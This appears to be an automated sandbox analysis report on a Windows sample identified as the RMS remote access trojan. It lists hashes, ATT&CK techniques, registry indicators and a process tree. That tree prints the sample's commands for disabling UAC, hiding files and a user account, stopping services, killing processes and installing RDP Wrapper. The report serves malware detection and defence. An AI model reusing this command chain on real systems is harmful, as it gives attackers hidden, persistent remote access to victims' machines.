rms | 42da9414a2faba94899ebaa84cd32841ac30db80d655c5be4d32ef568cc35014

Analysis

max time kernel
147s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
21-08-2024 20:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b4d453087720b8fbf93147c039f4f8fb_JaffaCakes118.exe
Size

6.6MB
MD5

b4d453087720b8fbf93147c039f4f8fb
SHA1

cfc9c30a92a61d0009bc4e21a1a808180d278218
SHA256

42da9414a2faba94899ebaa84cd32841ac30db80d655c5be4d32ef568cc35014
SHA512

1d498db675a631d91821786ef657d94814eadc8fc6062ad8256692bd5cf3e35632fce94e96d4672993b0fa36ed424cd7815d3ba81862ce0a75df4feebe9e9c51
SSDEEP

98304:9Xz+/uvg6x/emUKoJV5ElkmPNJgpEdneZi+H02YqAQcmJ3Q/mUfBA9qcu1ccH6i1:FK21H5WV5ElzMpYXY0fBQcb7BA2hHf

Score

10^/10

rms defense_evasion discovery evasion execution persistence privilege_escalation rat trojan upx

Malware Config

Signatures

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms

UAC bypass 3 TTPs 2 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
100	netsh.exe
2792	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2064	attrib.exe
3740	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WinUpdate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WinUpdate1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	run.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	RDPWrapper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	b4d453087720b8fbf93147c039f4f8fb_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	WinDevInstall.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	start1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	RDP.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	RDPWrapper_run.exe

Executes dropped EXE 20 IoCs

pid	Process
1832	WinDevInstall.exe
5076	start1.exe
4056	start.exe
3716	Builder.exe
696	Builder2.exe
564	WinUpdate.exe
1720	RDP.exe
2580	RDPWrapper_run.exe
2024	RDPWrapper.exe
3900	WinUpdate1.exe
1836	run.exe
1972	CDevice.exe
3484	CDevice.exe
3796	CDevice.exe
3332	CDevice.exe
1564	RDPWInst.exe
1872	sysdevices.exe
3396	sysdevices.exe
696	RDPWInst.exe
1696	sysdevices.exe

Loads dropped DLL 1 IoCs

pid	Process
1664	svchost.exe

UPX packed file 41 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000234b8-8.dat	upx
behavioral2/files/0x000a000000023412-38.dat	upx
behavioral2/memory/5076-42-0x0000000000400000-0x0000000000467000-memory.dmp	upx
behavioral2/files/0x000a0000000234ac-45.dat	upx
behavioral2/memory/4056-47-0x0000000000400000-0x0000000000467000-memory.dmp	upx
behavioral2/memory/5076-49-0x0000000000400000-0x0000000000467000-memory.dmp	upx
behavioral2/memory/3716-54-0x0000000000400000-0x0000000000467000-memory.dmp	upx
behavioral2/memory/696-56-0x0000000000400000-0x0000000000467000-memory.dmp	upx
behavioral2/memory/4056-61-0x0000000000400000-0x0000000000467000-memory.dmp	upx
behavioral2/memory/3716-65-0x0000000000400000-0x0000000000467000-memory.dmp	upx
behavioral2/memory/696-63-0x0000000000400000-0x0000000000467000-memory.dmp	upx
behavioral2/files/0x00070000000234c4-109.dat	upx
behavioral2/memory/3900-114-0x0000000000400000-0x000000000046A000-memory.dmp	upx
behavioral2/memory/3900-118-0x0000000000400000-0x000000000046A000-memory.dmp	upx
behavioral2/files/0x00070000000234c2-140.dat	upx
behavioral2/memory/1972-142-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral2/memory/1972-144-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral2/memory/3484-146-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral2/memory/3796-148-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral2/memory/3332-150-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral2/files/0x00070000000234c3-154.dat	upx
behavioral2/memory/1872-160-0x0000000000400000-0x00000000009B4000-memory.dmp	upx
behavioral2/memory/3796-163-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral2/memory/3396-162-0x0000000000400000-0x00000000009B4000-memory.dmp	upx
behavioral2/memory/1696-184-0x0000000000400000-0x00000000009B4000-memory.dmp	upx
behavioral2/memory/1696-185-0x0000000000400000-0x00000000009B4000-memory.dmp	upx
behavioral2/memory/3332-186-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral2/memory/3396-187-0x0000000000400000-0x00000000009B4000-memory.dmp	upx
behavioral2/memory/1872-188-0x0000000000400000-0x00000000009B4000-memory.dmp	upx
behavioral2/memory/3332-189-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral2/memory/3396-194-0x0000000000400000-0x00000000009B4000-memory.dmp	upx
behavioral2/memory/3332-196-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral2/memory/3396-200-0x0000000000400000-0x00000000009B4000-memory.dmp	upx
behavioral2/memory/3332-201-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral2/memory/3332-205-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral2/memory/3396-207-0x0000000000400000-0x00000000009B4000-memory.dmp	upx
behavioral2/memory/3332-213-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral2/memory/3396-215-0x0000000000400000-0x00000000009B4000-memory.dmp	upx
behavioral2/memory/3332-220-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral2/memory/3332-223-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral2/memory/3332-230-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
29	raw.githubusercontent.com
30	raw.githubusercontent.com
38	raw.githubusercontent.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Hide Artifacts: Hidden Users 1 TTPs 1 IoCs

defense_evasion

Hidden Users

T1564.002

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\root = "0"	reg.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4300	sc.exe
5024	sc.exe
4584	sc.exe
4268	sc.exe
900	sc.exe
3176	sc.exe
672	sc.exe
116	sc.exe
3740	sc.exe
1080	sc.exe
4388	sc.exe
3200	sc.exe
1272	sc.exe
2984	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 54 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CDevice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysdevices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinDevInstall.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDP.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CDevice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWInst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regedit.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	start1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	start.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWrapper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysdevices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Builder2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Builder.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	run.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sysdevices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWrapper_run.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CDevice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b4d453087720b8fbf93147c039f4f8fb_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WinUpdate1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CDevice.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
4324	taskkill.exe
4760	taskkill.exe

Runs .reg file with regedit 2 IoCs

pid	Process
1328	regedit.exe
1480	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
1972	CDevice.exe
1972	CDevice.exe
1972	CDevice.exe
1972	CDevice.exe
1972	CDevice.exe
1972	CDevice.exe
3484	CDevice.exe
3484	CDevice.exe
3796	CDevice.exe
3796	CDevice.exe
3332	CDevice.exe
3332	CDevice.exe
3332	CDevice.exe
3332	CDevice.exe
3332	CDevice.exe
3332	CDevice.exe
1872	sysdevices.exe
1872	sysdevices.exe
1664	svchost.exe
1664	svchost.exe
1664	svchost.exe
1664	svchost.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
676	Process not Found
676	Process not Found

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
1696	sysdevices.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	4324	taskkill.exe
Token: SeDebugPrivilege	4760	taskkill.exe
Token: SeDebugPrivilege	1972	CDevice.exe
Token: SeDebugPrivilege	3796	CDevice.exe
Token: SeTakeOwnershipPrivilege	3332	CDevice.exe
Token: SeTcbPrivilege	3332	CDevice.exe
Token: SeTcbPrivilege	3332	CDevice.exe
Token: SeAuditPrivilege	4268	svchost.exe
Token: SeDebugPrivilege	1564	RDPWInst.exe
Token: SeAuditPrivilege	1664	svchost.exe

Suspicious use of SetWindowsHookEx 21 IoCs

pid	Process
5076	start1.exe
4056	start.exe
696	Builder2.exe
3716	Builder.exe
564	WinUpdate.exe
1720	RDP.exe
2580	RDPWrapper_run.exe
2024	RDPWrapper.exe
3900	WinUpdate1.exe
932	cmd.exe
1836	run.exe
1768	cmd.exe
1972	CDevice.exe
1972	CDevice.exe
3484	CDevice.exe
3484	CDevice.exe
3796	CDevice.exe
3796	CDevice.exe
3332	CDevice.exe
1564	RDPWInst.exe
696	RDPWInst.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3300 wrote to memory of 1832	3300	b4d453087720b8fbf93147c039f4f8fb_JaffaCakes118.exe	87
PID 3300 wrote to memory of 1832	3300	b4d453087720b8fbf93147c039f4f8fb_JaffaCakes118.exe	87
PID 3300 wrote to memory of 1832	3300	b4d453087720b8fbf93147c039f4f8fb_JaffaCakes118.exe	87
PID 1832 wrote to memory of 5076	1832	WinDevInstall.exe	88
PID 1832 wrote to memory of 5076	1832	WinDevInstall.exe	88
PID 1832 wrote to memory of 5076	1832	WinDevInstall.exe	88
PID 5076 wrote to memory of 4056	5076	start1.exe	131
PID 5076 wrote to memory of 4056	5076	start1.exe	131
PID 5076 wrote to memory of 4056	5076	start1.exe	131
PID 4056 wrote to memory of 3716	4056	start.exe	153
PID 4056 wrote to memory of 3716	4056	start.exe	153
PID 4056 wrote to memory of 3716	4056	start.exe	153
PID 4056 wrote to memory of 696	4056	start.exe	152
PID 4056 wrote to memory of 696	4056	start.exe	152
PID 4056 wrote to memory of 696	4056	start.exe	152
PID 4056 wrote to memory of 564	4056	start.exe	93
PID 4056 wrote to memory of 564	4056	start.exe	93
PID 4056 wrote to memory of 564	4056	start.exe	93
PID 4056 wrote to memory of 1720	4056	start.exe	94
PID 4056 wrote to memory of 1720	4056	start.exe	94
PID 4056 wrote to memory of 1720	4056	start.exe	94
PID 1720 wrote to memory of 2580	1720	RDP.exe	96
PID 1720 wrote to memory of 2580	1720	RDP.exe	96
PID 1720 wrote to memory of 2580	1720	RDP.exe	96
PID 2580 wrote to memory of 2024	2580	RDPWrapper_run.exe	97
PID 2580 wrote to memory of 2024	2580	RDPWrapper_run.exe	97
PID 2580 wrote to memory of 2024	2580	RDPWrapper_run.exe	97
PID 564 wrote to memory of 3900	564	WinUpdate.exe	98
PID 564 wrote to memory of 3900	564	WinUpdate.exe	98
PID 564 wrote to memory of 3900	564	WinUpdate.exe	98
PID 3900 wrote to memory of 932	3900	WinUpdate1.exe	99
PID 3900 wrote to memory of 932	3900	WinUpdate1.exe	99
PID 3900 wrote to memory of 932	3900	WinUpdate1.exe	99
PID 932 wrote to memory of 2064	932	cmd.exe	101
PID 932 wrote to memory of 2064	932	cmd.exe	101
PID 932 wrote to memory of 2064	932	cmd.exe	101
PID 932 wrote to memory of 3200	932	cmd.exe	102
PID 932 wrote to memory of 3200	932	cmd.exe	102
PID 932 wrote to memory of 3200	932	cmd.exe	102
PID 932 wrote to memory of 3740	932	cmd.exe	145
PID 932 wrote to memory of 3740	932	cmd.exe	145
PID 932 wrote to memory of 3740	932	cmd.exe	145
PID 932 wrote to memory of 4268	932	cmd.exe	146
PID 932 wrote to memory of 4268	932	cmd.exe	146
PID 932 wrote to memory of 4268	932	cmd.exe	146
PID 932 wrote to memory of 1272	932	cmd.exe	105
PID 932 wrote to memory of 1272	932	cmd.exe	105
PID 932 wrote to memory of 1272	932	cmd.exe	105
PID 932 wrote to memory of 1080	932	cmd.exe	106
PID 932 wrote to memory of 1080	932	cmd.exe	106
PID 932 wrote to memory of 1080	932	cmd.exe	106
PID 932 wrote to memory of 3176	932	cmd.exe	107
PID 932 wrote to memory of 3176	932	cmd.exe	107
PID 932 wrote to memory of 3176	932	cmd.exe	107
PID 932 wrote to memory of 900	932	cmd.exe	147
PID 932 wrote to memory of 900	932	cmd.exe	147
PID 932 wrote to memory of 900	932	cmd.exe	147
PID 932 wrote to memory of 2984	932	cmd.exe	109
PID 932 wrote to memory of 2984	932	cmd.exe	109
PID 932 wrote to memory of 2984	932	cmd.exe	109
PID 932 wrote to memory of 672	932	cmd.exe	110
PID 932 wrote to memory of 672	932	cmd.exe	110
PID 932 wrote to memory of 672	932	cmd.exe	110
PID 932 wrote to memory of 4388	932	cmd.exe	111

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2064	attrib.exe
3740	attrib.exe

C:\Users\Admin\AppData\Local\Temp\b4d453087720b8fbf93147c039f4f8fb_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\b4d453087720b8fbf93147c039f4f8fb_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3300
- C:\ProgramData\CardWindows\WinDevInstall.exe
  "C:\ProgramData\CardWindows\WinDevInstall.exe" -p7832489354378589235643543456
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1832
- - C:\ProgramData\CardWindows\start1.exe
    "C:\ProgramData\CardWindows\start1.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:5076
  - - C:\ProgramData\CardWindows\start.exe
      "C:\ProgramData\CardWindows\start.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:4056
    - - C:\ProgramData\CardWindows\Builder.exe
        
        "C:\ProgramData\CardWindows\Builder.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3716
    - - C:\ProgramData\CardWindows\Builder2.exe
        
        "C:\ProgramData\CardWindows\Builder2.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:696
    - - C:\ProgramData\CardWindows\WinUpdate.exe
        
        "C:\ProgramData\CardWindows\WinUpdate.exe" -p5387687645378674524512345389721228
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:564
      - C:\ProgramData\CardWindows\WinUpdate1.exe
        
        "C:\ProgramData\CardWindows\WinUpdate1.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3900
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\CardWindows\SysInstall.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:932
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\ProgramData\CardWindows"
        8⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2064
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop RManService
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3200
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop VDeviceCard
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3740
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop NPackStereo
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4268
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop ServiceWork
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1272
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop IntelDriver
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1080
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop AMIHardware
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3176
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete RManService
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:900
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete VDeviceCard
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2984
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete NPackStereo
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:672
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete ServiceWork
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4388
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete IntelDriver
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4300
        
        C:\Windows\SysWOW64\sc.exe
        
        sc delete AMIHardware
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:5024
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im rfusclient.exe /f
        8⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4324
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im rutserv.exe /f
        8⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\SYSTEM\Nvidia\Toolbar\DeviceCard" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4404
        
        C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "C:\ProgramData\CardWindows\config_set.reg"
        8⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Runs .reg file with regedit
        
        PID:1328
        
        C:\ProgramData\CardWindows\CDevice.exe
        
        "C:\ProgramData\CardWindows\CDevice.exe" /silentinstall
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1972
        
        C:\ProgramData\CardWindows\CDevice.exe
        
        "C:\ProgramData\CardWindows\CDevice.exe" /firewall
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3484
        
        C:\Windows\SysWOW64\regedit.exe
        
        regedit /s "C:\ProgramData\CardWindows\config_set.reg"
        8⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Runs .reg file with regedit
        
        PID:1480
        
        C:\Windows\SysWOW64\sc.exe
        
        sc failure VDeviceCard reset= 0 actions= restart/500/restart/500/restart/500
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4584
        
        C:\Windows\SysWOW64\sc.exe
        
        sc config VDeviceCard obj= LocalSystem type= interact type= own
        8⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:116
        
        C:\ProgramData\CardWindows\CDevice.exe
        
        "C:\ProgramData\CardWindows\CDevice.exe" /start
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3796
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\ProgramData\CardWindows\*.*"
        8⤵
        Sets file to hidden
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:3740
    - - C:\ProgramData\CardWindows\RDP.exe
        
        "C:\ProgramData\CardWindows\RDP.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1720
      - C:\ProgramData\RDP\RDPWrapper_run.exe
        
        "C:\ProgramData\RDP\RDPWrapper_run.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2580
